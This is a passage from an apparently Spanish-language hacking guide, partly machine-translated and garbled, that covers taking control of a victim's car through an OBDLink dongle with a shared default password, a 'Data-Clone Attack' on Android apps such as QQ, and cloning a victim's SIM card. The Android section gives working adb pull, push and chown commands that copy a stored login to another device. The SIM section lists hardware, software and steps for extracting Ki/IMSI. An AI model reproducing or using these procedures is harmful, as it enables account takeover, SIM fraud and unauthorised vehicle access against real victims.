SALTEANDO   LA   ASIGNADA   Y   ESTO   FUNCIONA   SOLO   PARA   VERSIONES
ANTIGUAS DE BTICINO.
14CONTROLAR VEHICULO DESDE TU CELULAR CON OBDLINK
LX BLUETOOTH

Ahora podemos controlar un auto con ayuda de OBD el cual es un producto valorado en 79$
dolares en amazon cuenta con una aplicación personalizada para iOS.

https://www.amazon.com/gp/product/B00H9S71LW/ref=as_li_tl?
ie=UTF8&camp=1789&creative=390957&creativeASIN=B00H9S71LW&linkCode=as2&tag=thedr
oideffec-20

una de las cosas que traemos con el hacking en este producto es que nosotros teniendo lo
siguiente:
1) Un ceular android
2) La aplicación OBDLink
3) Conexión via Bluetooth “con esto bastaria para scannear y buscar el dispositivo y
conectarnos.
Ahora un ejemplo de la busqueda de la conexión de nuestro celular buscando un punto en
comunicación via Bluetooth con el dispositivo en nuestro auto o en el autro de nuestra
victima:

Y activado observaremos un punto de conexión cercano con el auto:

Abrimos la aplicación y preisonamos en conectar:

Presionamos en conectar y establecemos conexión con el dispositivo al hardware instalado al


vehiculo por medio de una conexión Bluetooth.
- Mapa grafico explicativo -

Si no lo hemos dicho tambien existe una conexión entre la aplicación a un red wifi y lo puedes
hacer sencillamente desde la aplicación y tendras el mismo remoto control del vehiculo y
visualizacion de estado de este.

Al pesar de los problemas de conexión WiFi a un individuo con la aplicación y que camine por la
calle y se encuentre con esta red WiFi protegida por WPA2 todos los dispositivos utilizan una
misma contraseña:
Observamos en el hardware donde dice la contraseña de esta red:

15ATACAR APLICACIONES ANDROID CON “DATA-CLONE-


ATTACK” METODO

Un 0day investiado por SuperHei lo llamo “Data-clone-Attack” se puede omitir la autenticación


de contraseña, cuando el usuario de inicio de sesión de la aplicación y ajuste "recordar
contraseña" algunas aplicaciones es definir.

Procedimiento De Ensayo:

1. abierto dos emulador.


> adb devices
Lista de dispositivos conectados
dispositivo emulador-5554
dispositivo emulador-5556

ambos dispositivos se instalan


(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, también
se pueden utilizar otras aplicaciones para probar.

2) iniciar sesión en la aplicación "emulador-5554" y asegúrese de elegir el "recordar


contraseña".
a continuación, tire de los datos de la aplicación en el PC.
Vamos a la terminal de nuevo: escribimos:
>adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab
pull: building file list...
3) empujar los datos a "emulador-5556"
>adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/

4) -adb shell "emulador-5556"


>adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer
drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq
y obtener el propietario com.tencent.mobile qq es "app_35".
Debido a que los datos de empuje es root.
# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root root 2012-12-06 07:17 shared_prefs
drwxrwxr-x root root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x system system 2012-12-06 07:17 lib

por lo que necesitamos a chown:


# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35 root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x app_35 system 2012-12-06 07:17 lib

pluma de la aplicación en "emulador-5556", y tienen ingrese en el qq com.tencent.mobile en


"emulador-5556".
Cómo obtener el contenido de los datos: es clave para la realización del ataque. algunos como
esto:
Ya tiene privilegios de super
bajo el intérprete de comandos como la demo, u puede eludir la autenticación de contraseña
utilizada "Data-Clone Attack".
(Cross-site-scriptin en Android)
app + webview + xss(or webkit xcs vul) = "Data-Clone"
En la versión anterior de Android, aplicaciones o XSS webkit androide xcs vul puede leer el
contenido del archivo local de:
http://www.80vul.com/android/android-0days.txt
Ventaja:

Así vista web de la aplicación tiene los permisos de archivos de lectura a los datos de la
aplicación. cuando un usuario de la aplicación visite un enlace URL, se pueden clonar los datos.

16 CLONANDO SIM EL SIM DE TU VICTIMA

Ha sido un trabajo para el area de delitos informaticos en multiples sedes de todo el mundo
donde los agentes policiales del equipo de delitos informaticos aplican las tecnicas forenses
informaticas pero todo con la finalidad de recolectar informacion en los siguientes componentes
del hardware:

1) SIM
2) SD
3) Unidades Flash
4) Memoria Interna y secundaria.
SIM :tiene un algoritmo para autentificar al subcriptor en la red y el numero de telefono.
Acceso SIM:

1) El acceso se realiza mediante una clave PIN


2) Cuando la SIM redcibe eneria, lo primero que solicita es el PIN que desbloquea el acceso
logico al contenido de la tarjeta
3) Sin el pin de acceso logico a la tarjeta no es factible. es posible aunque no de forma
predeterminada que la tarjeta no presente PIN.

CLONANDO UNA SIM:

HARDWARE:
GRABADORA DE PIC TIPO LUDIPIPO
GRABADORA EEPROM
TARJETA CON MICROPROCESADOR DONDE GRABA. SE UTILIZA EN TARJETAS COOLWAFER

SOFTWARE:

SIM SCAN: PERMITE OBTENER LOS CODIGOS IMSI Y KI


ICPRO: GRABA EL PIC
WINEXPLORER: GRABA LA EEPROM

ICCID:CIRCUITO INTEGRADO DE IDENTIFICACION


IMSI:SUBSCRIBER IDENTIFICADOR

QUE TIENE LA SIM COMO TAL:

1) MENSAJES RECIBIDOS
2) NUMEROS DE TELEFONOS
3) ULTIMAS LLAMADAS

PROCESO DE CLONACION SIM:


NECESITAMOS UN SIM CARD READER PARA INSERTAR LA SIM DE LA VICTIMA Y LO PODEMOS
CONSEGUIR EN VENTA EN ALIBABA LO PUEDES CONSGUIR EN LA SIGUIENTE DIRECCION:

HTTPS://WWW.ALIBABA.COM/SHOWROOM/SIM-CARD-READER-WRITER.HTML

REQUERIMOS:
1) TARJETA SIM EN BLANCO
2) LECTOR DE TARJETA SIM
3) SOFTWARE PARA GENERAR EL CONTENIDO DE SIM EN BLANCO
PROCESO:

1) QUITAR LA SIM DE SU TELÉFONO, LO COLOCA EN EL LECTOR DE TARJETAS SIM


LEER EL CÓDIGO DE KI Y EL IMSI
LEER LA TARJETA SIM PARA KI Y EL IMSI UTILIZANDO EL SOFTWARE
LA ESCRITURA EN LA TARJETA EN BLANCO

1) PONER LA TARJETA EN BLANCO EN EL LECTOR


2) SELECCIONE ESCRITURA PARA SIM
3) SELECCIONAR EL ARCHIVO .DAT A AHORRAR ANTES
4) SE LLEVARÁ UNOS 10 MINUTOS PARA ESCRIBIR
FINALIZANDO : “SU TARJETA ES CLONADA”

SI INTENTA HACER 2 LLAMADAS AL MISMO TIEMPO, UNO VA A IR A TRAVÉS DE, EL OTRO DIRÁ
LLAMADA FALLA, Y AMBOS LOS TELÉFONOS TENDRÁN LOS MISMOS MENSAJES, TEXTO Y VOZ, Y
AMBOS RECIBIRÁN LAS MISMAS LLAMADAS, PERO SÓLO UNO PUEDE HABLAR A LA VEZ.